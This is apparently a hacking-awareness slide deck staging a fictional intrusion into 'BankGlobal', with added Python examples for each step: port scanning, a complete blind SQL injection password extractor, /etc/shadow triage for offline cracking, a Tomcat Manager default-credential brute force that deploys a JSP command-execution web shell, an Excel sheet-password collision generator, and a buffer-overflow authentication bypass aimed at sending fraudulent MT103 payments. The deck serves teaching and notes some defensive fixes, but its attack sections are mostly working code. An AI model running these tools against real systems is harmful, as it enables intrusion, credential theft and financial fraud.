2. “WOW! It’s only taken me 3 seconds to hack into this secure computer system”
Misconceptions about hacking…
3. The organization and people mentioned throughout the remainder of this presentation are not real.
But… the techniques are!
4. Target…
BankGlobal is a medium-sized bank. We overheard some of their employees talking in the hotel bar about their security and we decided to look into it.
5. Objectives…
1. See if we can find a way to access sensitive financial information belonging to the bank.
2. Steal the data, and modify it so it’s no longer useful to them.
6. Scenario #1
Recon
From searching around online we found one of BankGlobal’s IP addresses: 10.10.10.1
Let’s see what we can figure out from it via a port scan
8. Scenario #1
Recon
The first thing we do is identify the IP of the BankGlobal website so that we can perform a port scan. The scan shows the following open ports:
Port 22 Secure Shell (SSH) – secure remote connection
Port 25 Simple Mail Transfer Protocol (SMTP) – mail
Port 53 Domain Name System (DNS)
Port 80 HTTP – the web server we already know about
Port 443 HTTPS – the same web server over TLS
Port 8080 – alternate HTTP port, commonly used by application servers and admin consoles
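The connect scan the slide describes, as an added example that is not part of the deck. It is a plain TCP connect scan with a banner grab (what an unprivileged attacker can do without nmap); the port labels are the ones the slide lists, and the local listener is a constructed stand-in for a target so the script runs offline. Against a real host you would pass its address and the ports of interest to scan_ports().

```python
"""Minimal TCP connect scan with banner grab (added example, not from the deck)."""
import socket
import threading
from typing import Dict, List, Tuple

# Well-known ports from the slide, labelled as the slide labels them (assumed list).
KNOWN_PORTS = {22: "ssh", 25: "smtp", 53: "dns", 80: "http", 443: "https", 8080: "http-alt"}


def grab_banner(sock: socket.socket, timeout: float = 0.5) -> str:
    """Read whatever the service volunteers (SSH and SMTP announce themselves); empty if silent."""
    sock.settimeout(timeout)
    try:
        return sock.recv(256).decode("ascii", errors="replace").strip()
    except (socket.timeout, OSError):
        return ""


def scan_ports(host: str, ports: List[int], timeout: float = 0.5) -> Dict[int, str]:
    """Return {open_port: banner}. A full connect is noisy (it completes the handshake,
    so it lands in logs) but needs no raw-socket privileges."""
    found: Dict[int, str] = {}
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout) as sock:
                found[port] = grab_banner(sock, timeout)
        except OSError:
            continue  # closed, filtered or unreachable all look alike to a connect scan
    return found


def describe(results: Dict[int, str]) -> List[str]:
    """Render results in nmap-like one-liners, guessing the service from the port number."""
    lines = []
    for port, banner in sorted(results.items()):
        label = KNOWN_PORTS.get(port, "unknown")
        lines.append(f"{port}/tcp open {label}" + (f" banner={banner!r}" if banner else ""))
    return lines


def start_fake_service(banner: bytes) -> int:
    """Constructed stand-in for a real target: one listener on 127.0.0.1 that sends a banner."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve() -> None:
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return port


def demo_scan() -> Tuple[int, Dict[int, str]]:
    """Scan the constructed listener plus one adjacent port; returns (listener_port, results)."""
    port = start_fake_service(b"SSH-2.0-OpenSSH_8.9\r\n")
    return port, scan_ports("127.0.0.1", [port, port + 1], timeout=2.0)


if __name__ == "__main__":
    port, results = demo_scan()
    for line in describe(results):
        print(line)
```

The banner is the useful part: a version string such as the constructed SSH one above is what you feed into a vulnerability search, and its absence on 8080 is itself a hint to go and browse the port, as the later slides do.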
9. Scenario #1
Port scan, zone transfer, etc.
We browse to the web application and notice a login screen. What can we do from here?
Looking at the page source we can see the admin appears to have taken a shortcut by attempting to hide the password in plain sight: an encoded value left in the page source.
Can we decode the value?
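A scanner for values “hidden in plain sight”, as an added example that is not part of the deck. It pulls every base64- or hex-looking token out of page source and keeps the decodings that come out as readable text. The HTML, the field names and the credential Sup3rS3cr3t!2019 are all constructed for illustration.

```python
"""Find encoded secrets left in page source (added example, not from the deck)."""
import base64
import binascii
import re
from typing import List, Tuple

# Constructed sample page source; the hidden field and the comment are the planted "shortcut".
SAMPLE_HTML = """<!-- constructed sample page source -->
<form method="post" action="/login">
  <p class="note">Authentication required</p>
  <input type="hidden" name="pw_check" value="U3VwM3JTM2NyM3QhMjAxOQ==">
  <!-- admin note: key = 53757033725333637233742132303139 -->
</form>
"""

# Long runs of base64 alphabet (with optional padding) and of hex bytes.
B64_RE = re.compile(r"[A-Za-z0-9+/]{12,}={0,2}")
HEX_RE = re.compile(r"\b(?:[0-9a-fA-F]{2}){6,}\b")


def looks_like_text(data: bytes) -> bool:
    """A decoding is only interesting if it is almost entirely printable ASCII."""
    if not data:
        return False
    printable = sum(32 <= b < 127 for b in data)
    return printable / len(data) > 0.9


def try_decode(token: str) -> List[Tuple[str, str]]:
    """Return (encoding, plaintext) for every decoding of `token` that yields readable text."""
    hits: List[Tuple[str, str]] = []
    if HEX_RE.fullmatch(token):
        try:
            raw = bytes.fromhex(token)
            if looks_like_text(raw):
                hits.append(("hex", raw.decode("ascii")))
        except ValueError:
            pass
    if B64_RE.fullmatch(token):
        try:
            raw = base64.b64decode(token, validate=True)  # rejects non-alphabet chars and bad length
            if looks_like_text(raw):
                hits.append(("base64", raw.decode("ascii")))
        except (binascii.Error, ValueError):
            pass
    return hits


def find_hidden_values(html: str) -> List[Tuple[str, str, str]]:
    """Scan comments, hidden inputs and script literals alike; return (token, encoding, plaintext)."""
    findings: List[Tuple[str, str, str]] = []
    candidates = set(B64_RE.findall(html)) | set(HEX_RE.findall(html))
    for token in sorted(candidates):
        for encoding, plaintext in try_decode(token):
            findings.append((token, encoding, plaintext))
    return findings


if __name__ == "__main__":
    for token, encoding, text in find_hidden_values(SAMPLE_HTML):
        print(f"{encoding:6} {token} -> {text!r}")
```

Ordinary words such as “Authentication” match the base64 alphabet too, which is why the decoder validates length and padding and then checks that the result is readable before reporting it. The defensive point is the obvious one: encoding is not secrecy, and nothing that gates access belongs in content served to the client.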
11. Scenario #2
SQL injection
Logging in successfully redirects us to a Staff Directory page where we can verify employees of Bank Global.
A quick search of LinkedIn reveals the name of a manager, Sarah Connor.
I wonder if we can get any useful information from the Staff Directory page?
12. Scenario #2
SQL injection
Let’s put some unexpected characters (a single quote, for example) in the input fields and see what happens.
One of the parameters appears to be vulnerable to SQL injection, but the page doesn’t display the query’s output, so this is blind injection. Inject always-true and always-false conditions and compare how the application responds to each.
Use the SUBSTR function to test the password one character at a time, observing the true/false response, until you retrieve Sarah Connor’s password.
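The boolean-based blind extraction the slide describes, carried through end to end, as an added example that is not code from the deck. The staff table, its column names and the directory lookup are constructed stand-ins (the table stores plaintext passwords, which is itself the bad practice the exercise exploits); against a real target the oracle would be an HTTP request whose response is classified as match or no match. The example goes one step beyond the slide: instead of guessing each character linearly it binary-searches the character’s code point, so each position costs about 7 requests instead of up to 95.

```python
"""Boolean-based blind SQL injection driven by SUBSTR (added example, not from the deck)."""
import sqlite3
from typing import Callable

# Constructed data standing in for BankGlobal's staff directory.
db = sqlite3.connect(":memory:")
db.executescript(
    """
    CREATE TABLE staff (name TEXT, password TEXT);
    INSERT INTO staff VALUES ('Sarah Connor', 'Hasta!aV1sta');
    INSERT INTO staff VALUES ('John Smith',   'welcome1');
    """
)


def directory_lookup_vulnerable(name: str) -> bool:
    """The slide's injectable parameter: string concatenation. The page only
    reveals whether a row matched (found / not found), never the row itself."""
    sql = f"SELECT 1 FROM staff WHERE name = '{name}'"
    return db.execute(sql).fetchone() is not None


def directory_lookup_fixed(name: str) -> bool:
    """Same feature, parameterised: user input can never become part of the SQL."""
    return db.execute("SELECT 1 FROM staff WHERE name = ?", (name,)).fetchone() is not None


def confirm_injection(oracle: Callable[[str], bool], name: str) -> bool:
    """Always-true versus always-false: if the responses differ, the input reaches the query."""
    true_case = oracle(f"{name}' AND '1'='1")
    false_case = oracle(f"{name}' AND '1'='2")
    return true_case and not false_case


def extract_password(oracle: Callable[[str], bool], name: str, max_len: int = 64) -> str:
    """Recover the password column for `name` one character at a time.

    The yes/no question asked of the oracle is
        unicode(substr(password, pos, 1)) > N
    and N is binary-searched over printable ASCII (32..126)."""
    recovered = ""
    for pos in range(1, max_len + 1):
        # Stop as soon as there is no character at this position.
        if not oracle(f"{name}' AND length(password) >= {pos} AND '1'='1"):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"{name}' AND unicode(substr(password,{pos},1)) > {mid} AND '1'='1"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    target = "Sarah Connor"
    print("injectable:", confirm_injection(directory_lookup_vulnerable, target))
    print("password:", extract_password(directory_lookup_vulnerable, target))
    print("injectable after fix:", confirm_injection(directory_lookup_fixed, target))
    print("recovered after fix:", repr(extract_password(directory_lookup_fixed, target)))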
14. Scenario #3
Grab the hashes
Now that we have Sarah Connor’s password, I wonder if we can log in to 10.10.10.1 via SSH?
Let’s see what Sarah has rights to do
15. Scenario #3
Grab the hashes
On Unix machines, user password hashes (not the passwords themselves, and not encrypted passwords) are stored in /etc/shadow, which is readable only by root. If Sarah can read it, she has elevated rights, and the hashes can be cracked offline.
What about other interesting files?
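A parser and triage for /etc/shadow entries, as an added example that is not part of the deck: which hash scheme each account uses, which accounts have no password or are locked, and which entries are worth feeding to an offline cracker. The shadow lines below are constructed; the user names are made up and the hash fields are placeholders in the correct syntax, not real password hashes.

```python
"""Parse /etc/shadow and triage which entries merit offline cracking (added example)."""
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample; hash fields are placeholders, not real hashes.
SAMPLE_SHADOW = """\
root:$6$rounds=5000$saltsalt$c0nstructedPlaceholderHashValueNotReal:19500:0:99999:7:::
sconnor:$6$Xy12abcd$anotherPlaceholderSha512CryptValue:19460:0:99999:7:::
backup:$1$abcdefgh$ijklmnopqrstuvwxyz1234:15000:0:99999:7:::
legacy:ab/cdefghijk1:12000:0:99999:7:::
svc_batch::19500:0:99999:7:::
nobody:*:19500:0:99999:7:::
jsmith:!$6$lockedsalt$placeholderHashOfLockedAccount:19500:0:99999:7:::
"""

# crypt(3) scheme identifiers as they appear at the start of the hash field.
SCHEMES = {
    "$1$": "md5crypt (fast, weak)",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$7$": "scrypt",
    "$y$": "yescrypt",
}


@dataclass
class ShadowEntry:
    user: str
    hash_value: str    # hash field with any leading '!' (lock marker) stripped
    last_change: str   # days since the epoch, as stored
    scheme: str
    crackable: bool    # a real hash is present, so an offline guesser can attack it
    note: str


def identify_scheme(hash_field: str) -> str:
    for prefix, label in SCHEMES.items():
        if hash_field.startswith(prefix):
            return label
    if len(hash_field) == 13 and "$" not in hash_field:
        return "traditional DES crypt (8-character limit, trivially cracked)"
    return "unknown"


def parse_shadow_line(line: str) -> Optional[ShadowEntry]:
    parts = line.rstrip("\n").split(":")
    if len(parts) < 9 or not parts[0]:
        return None
    user, field, last_change = parts[0], parts[1], parts[2]
    if field == "":
        return ShadowEntry(user, field, last_change, "none", False,
                           "EMPTY password field: anyone can log in as this user with no password")
    if field in ("*", "!", "!!"):
        return ShadowEntry(user, field, last_change, "none", False, "no password set / account locked")
    locked = field.startswith("!")
    hash_value = field.lstrip("!")
    scheme = identify_scheme(hash_value)
    note = "locked, but the hash is still present and crackable" if locked else "active"
    return ShadowEntry(user, hash_value, last_change, scheme, scheme != "unknown", note)


def parse_shadow(text: str) -> List[ShadowEntry]:
    entries = [parse_shadow_line(line) for line in text.splitlines()]
    return [e for e in entries if e is not None]


def cracker_input(entries: List[ShadowEntry]) -> List[str]:
    """user:hash lines in the form john/hashcat accept, for the attackable entries only."""
    return [f"{e.user}:{e.hash_value}" for e in entries if e.crackable]


def findings(entries: List[ShadowEntry]) -> List[str]:
    """The entries a reviewer would flag: no password, or a fast/legacy hash scheme."""
    out = []
    for e in entries:
        if e.note.startswith("EMPTY") or e.scheme.startswith(("md5crypt", "traditional")):
            out.append(f"{e.user}: {e.scheme} - {e.note}")
    return out


if __name__ == "__main__":
    shadow = parse_shadow(SAMPLE_SHADOW)
    for e in shadow:
        print(f"{e.user:10} {e.scheme:50} {e.note}")
    print("\nflagged:", *findings(shadow), sep="\n")
    print("\nfeed to a cracker:", *cracker_input(shadow), sep="\n")
```

Two things the triage makes visible that a raw dump does not: a locked account (leading `!`) still carries its hash, so it is as crackable as an active one and may reveal a password reused elsewhere; and an empty second field is not a locked account but an account with no password at all.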
19. Scenario #4
Default credentials and WAR file
Excellent! It’s an Apache Tomcat server. What can we do with this?
Let’s see if we can find a way to gain better access than what Sarah Connor had…
20. Scenario #4
Default credentials and WAR file
The server exposes the Tomcat Manager web application. Through it we can deploy a custom WAR file, which Tomcat unpacks and runs with the privileges of the Tomcat service account.
The Manager requires authentication. I wonder if they assigned a good password to the admin account, or left a default in place?
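The two steps on this slide in code, as an added example that is not part of the deck: try a list of well-known default Manager credentials, then build and deploy a WAR through the Manager’s text API. The target URL, the context path and the JSP payload are assumptions; the credential pairs are the example users shipped in Tomcat’s sample tomcat-users.xml and commonly left enabled. Only the WAR builder runs offline; the HTTP functions need a reachable Tomcat.

```python
"""Tomcat Manager default credentials and WAR deployment (added example, not from the deck)."""
import base64
import io
import urllib.error
import urllib.request
import zipfile
from typing import List, Optional, Tuple

# Assumed list: sample/default accounts frequently found on Tomcat installs.
DEFAULT_CREDS: List[Tuple[str, str]] = [
    ("tomcat", "tomcat"), ("tomcat", "s3cret"), ("admin", "admin"),
    ("admin", ""), ("tomcat", ""), ("manager", "manager"), ("role1", "tomcat"),
]

WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1"/>
"""

# Minimal JSP that runs one OS command passed as ?cmd=; stands in for any payload.
CMD_JSP = """<%@ page import="java.io.*" %><%
String cmd = request.getParameter("cmd");
if (cmd != null) {
  Process p = Runtime.getRuntime().exec(cmd);
  BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
  String line; while ((line = r.readLine()) != null) { out.println(line); }
}
%>"""


def build_war(jsp_name: str = "cmd.jsp", jsp_source: str = CMD_JSP) -> bytes:
    """A WAR is just a zip with WEB-INF/web.xml plus content; Tomcat unpacks and serves it."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML)
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war: bytes) -> List[str]:
    with zipfile.ZipFile(io.BytesIO(war)) as z:
        return sorted(z.namelist())


def basic_auth(user: str, password: str) -> str:
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def try_default_creds(base_url: str, creds=DEFAULT_CREDS, timeout: float = 5.0) -> Optional[Tuple[str, str]]:
    """Return the first (user, password) the Manager text API accepts, or None.

    /manager/text/list needs the manager-script role. 401 means the credentials
    are wrong; 403 means they are valid but lack that role (still worth noting)."""
    for user, password in creds:
        req = urllib.request.Request(base_url.rstrip("/") + "/manager/text/list",
                                     headers={"Authorization": basic_auth(user, password)})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                if resp.status == 200 and resp.read().startswith(b"OK"):
                    return user, password
        except urllib.error.HTTPError as e:
            if e.code not in (401, 403):
                raise
    return None


def deploy_war(base_url: str, user: str, password: str, path: str, war: bytes,
               timeout: float = 15.0) -> str:
    """PUT the WAR to /manager/text/deploy?path=...; Tomcat replies 'OK - Deployed application ...'."""
    req = urllib.request.Request(
        base_url.rstrip("/") + f"/manager/text/deploy?path={path}&update=true",
        data=war, method="PUT",
        headers={"Authorization": basic_auth(user, password),
                 "Content-Type": "application/octet-stream"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    target = "http://10.10.10.1:8080"   # assumed lab target from the deck
    found = try_default_creds(target)
    if found:
        print("Manager accepted", found)
        print(deploy_war(target, found[0], found[1], "/bg", build_war()))
        print("now request", target + "/bg/cmd.jsp?cmd=id")
    else:
        print("no default credentials accepted")
```

The fix on the defending side is the mirror image: remove the sample users, give the Manager a strong unique password, bind it (via its RemoteAddrValve) to administrative addresses only, and run Tomcat as an unprivileged account so a deployed WAR does not inherit more than it should.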
22. Scenario #5
Password protected .xls
We have obtained access to a confidential spreadsheet belonging to Bank Global.
They decided that password protecting sheets would prevent unintended modification.
Can we find a way to modify this file?
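Why sheet protection stops nobody, as an added example that is not part of the deck. Excel stores a 16-bit verifier of the sheet password (the legacy algorithm in MS-OFFCRYPTO 2.3.7.1, the PASSWORD record in a .xls); the code below computes it and then constructs, rather than brute-forces, a different 12-character string with the same verifier, which Excel accepts as the password. The sample password is made up.

```python
"""Excel worksheet protection: a 16-bit verifier, not encryption (added example)."""
from typing import List

MASK15 = 0x7FFF


def rot15(x: int, k: int = 1) -> int:
    """Rotate a 15-bit value left by k positions."""
    k %= 15
    return ((x << k) | (x >> (15 - k))) & MASK15


def sheet_verifier(password: str) -> int:
    """The verifier Excel compares against when you 'unprotect' a sheet."""
    v = 0
    for byte in reversed(password.encode("latin-1")):
        v = rot15(v) ^ byte
    return rot15(v) ^ len(password) ^ 0xCE4B


def equivalent_password(target: int) -> str:
    """Construct a 12-character string whose verifier equals `target`.

    Unrolling the loop shows the verifier is linear over XOR:
        target = 0xCE4B ^ len ^ XOR_i rot15(char_i, i)    (i = 1-based position)
    Choosing each of the first 11 characters from {'A','B'} toggles the bit pair
    (i, i+1); one final printable character supplies the remaining bits. Every
    one of the 2^15 reachable verifier values has such a preimage, which is why
    the classic VBA "password remover" macros always succeed."""
    for tail in range(32, 127):                       # the free final character
        d = target ^ 0xCE4B ^ 12 ^ rot15(tail, 12)    # what the first 11 chars must XOR to
        for i in range(1, 12):
            d ^= rot15(ord("A"), i)                   # start from 'AAAAAAAAAAA'
        head: List[str] = []
        for i in range(1, 12):
            if (d >> i) & 1:                          # bit i still wrong: use 'B' here
                head.append("B")
                d ^= rot15(ord("A") ^ ord("B"), i)    # flips bits i and i+1
            else:
                head.append("A")
        if d == 0:
            candidate = "".join(head) + chr(tail)
            assert sheet_verifier(candidate) == target
            return candidate
    raise AssertionError("unreachable: every verifier value has a 12-character preimage")


if __name__ == "__main__":
    real = "BankGlobal!2019"   # made-up sheet password
    v = sheet_verifier(real)
    alt = equivalent_password(v)
    print(f"stored verifier: {v:04X}")
    print(f"{real!r} and {alt!r} both unlock the sheet")
```

Finding an equivalent password is the polite route; since sheet protection never encrypts the cell data, the blunt route is to open the workbook with any library or editor that ignores the protection flag and change the cells directly. Either way, worksheet protection is a guard against accidental edits, not a control against a motivated person; data that must not be altered needs file-level encryption and integrity checks outside the spreadsheet.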
24. Scenario #6
Buffer overflow
Bank Global has written their own program to send MT103 messages without using SWIFT interfaces.
It is designed to ensure that only authorized personnel can send messages.
25. Scenario #6
Buffer overflow
A buffer overflow occurs when more data is written into a fixed-size buffer than it was allocated to hold, so the excess overwrites whatever sits next to it in memory (other variables, or control data such as the saved return address).
We were able to decompile the binary. Look at the code to see if it tells you anything: how large is the input buffer, and what is stored right after it?
Can we find a way to bypass authentication?
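A model of the bypass, as an added example that is neither from the deck nor the decompiled binary. It reproduces in Python the C pattern a decompiler typically reveals for this class of bug: a fixed-size password buffer with the authorized flag laid out immediately after it, filled by an unbounded copy. The buffer size, the names, the secret and the attack string are assumptions; in the real program the exact layout depends on the compiler, which is what reading the decompiled code tells you.

```python
"""Stack-variable overwrite model of the MT103 sender's auth bypass (added example)."""
import struct
from typing import Callable

BUF_SIZE = 16             # assumed: char password[16];
FLAG_OFFSET = BUF_SIZE    # assumed: int authorized; placed immediately after the buffer
SECRET = b"s3cr3t"        # assumed: the password the program compares against


class Frame:
    """The two locals as one contiguous block, the way a compiler lays them out."""

    def __init__(self) -> None:
        self.mem = bytearray(BUF_SIZE + 4)   # zero-initialised: authorized == 0

    @property
    def authorized(self) -> int:
        return struct.unpack_from("<i", self.mem, FLAG_OFFSET)[0]

    def password(self) -> bytes:
        """What strcmp() would see: bytes up to the first NUL inside the buffer."""
        return bytes(self.mem[:BUF_SIZE]).split(b"\0", 1)[0]

    def write(self, data: bytes) -> None:
        if len(data) > len(self.mem):
            # Beyond the modelled frame: in the real program this clobbers the saved
            # frame pointer / return address and usually crashes (or worse).
            raise MemoryError("write past the end of the stack frame")
        self.mem[0:len(data)] = data


def read_password_unsafe(frame: Frame, user_input: bytes) -> None:
    """gets()/strcpy()-style: copies every byte plus the terminator, no length check."""
    frame.write(user_input + b"\0")


def read_password_safe(frame: Frame, user_input: bytes) -> None:
    """fgets()/strlcpy()-style: never writes more than BUF_SIZE bytes, always NUL-terminated."""
    frame.write(user_input[:BUF_SIZE - 1] + b"\0")


def check_password(frame: Frame) -> None:
    """The program's own check: the flag is set only on a correct password."""
    if frame.password() == SECRET:
        struct.pack_into("<i", frame.mem, FLAG_OFFSET, 1)


def attempt(reader: Callable[[Frame, bytes], None], user_input: bytes) -> bool:
    """One login attempt; True means the program would let us send an MT103."""
    frame = Frame()
    reader(frame, user_input)
    check_password(frame)
    return frame.authorized != 0


# Attack string: fill the 16-byte buffer, then one non-zero byte lands in 'authorized'.
OVERFLOW_INPUT = b"A" * BUF_SIZE + b"\x01"

if __name__ == "__main__":
    print("wrong password, unsafe read:", attempt(read_password_unsafe, b"guess"))
    print("overflow, unsafe read:      ", attempt(read_password_unsafe, OVERFLOW_INPUT))
    print("overflow, bounded read:     ", attempt(read_password_safe, OVERFLOW_INPUT))
```

The flag is never compared against the secret again after the copy, so it does not matter that the password check fails: the overflow set it before the check ran. The bounded reader closes that path, and compilers add further defences (stack canaries, variable reordering) that are worth checking for when you read the decompiled binary.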
27. Mission accomplished!
We were able to hack into BankGlobal, steal the data, modify it so they can’t use it, and then send an MT103 to an account we control.
28. Would this really work?
76% of breaches in 2018 were financially motivated (2018 Verizon Data Breach Investigations Report)
81% of hacking-related breaches leveraged either stolen or weak passwords (2017 Verizon Data Breach Investigations Report)
Heartland Payment Systems (2008, disclosed 2009) – SQL injection attacks resulting in more than $300 million loss
Magento (2019) – SQL injection exposed over 300,000 e-commerce websites and millions of users to attack
Misconceptions about hacking
TV shows and movies make hacking look really spectacular
It takes a Hollywood actor an average of 3 seconds to hack the most secure computer system
They are ALWAYS successful and NEVER caught
Anything can be instantly hacked: Banks, Schools, Hospitals, even time itself!
Don’t believe me? Check out one of our all-time favorite hacking scenes!
Let’s see what this really looks like!
We have developed a series of “realistic” hacking challenges
These target common poor security practices
The scenario is that we are a hacker targeting a fictitious financial institution called “Bank Global”
Objective
1. See if we can find a way to access sensitive financial information belonging to the bank
2. Steal the data, and modify it so it is no longer useful to them
You browse to 10.10.10.1 over port 80 and find a Bank Global web application
It’s asking for authentication…
I wonder if we can bypass the authentication?
Clue #2 The admin appears to have taken a shortcut by attempting to hide the password in plain sight
Logging in successfully redirects us to a Staff Directory page where we can verify employees of Bank Global
We overheard an employee in the hotel bar talking about an upcoming meeting with his boss, Sarah Connor
I wonder if we can get any useful information from the Staff Directory page?
Clue #1 Let’s put some unexpected characters in the input fields and see what happens
Now that you have Sarah Connor’s password, I wonder if you can log in to 10.10.10.1 via SSH?
Let’s see what Sarah has rights to do
Clue #1 On Unix machines, user password hashes are stored in a file called /etc/shadow, readable only by root
Did we get the hashes?
Our port scan also showed that port 8080 was open, let’s browse to it and see what it is
Excellent! It’s an Apache Tomcat server. I heard there are ways to exploit this
Let’s see if we can find a way to gain better access than what Sarah Connor had…
Clue #1 The server allows access to a Tomcat web application called the Manager. Through this application we can deploy a custom WAR file
Scenario #5 Password protected .xls
We have obtained network access to a confidential spreadsheet belonging to Bank Global
They decided that password protecting sheets would prevent unintended modification
Can we find a way to modify this file?
This will be helpful later
Scenario #6 Buffer overflow
Bank Global has written their own program to send MT103 messages without using SWIFT interfaces
It is designed to ensure that only authorized personnel can send messages
We have heard that it isn’t coded very well and may have some vulnerabilities present
Let’s see if we can bypass the authorization required
If their custom-developed program has such basic security flaws, I wonder how secure the rest of their network is?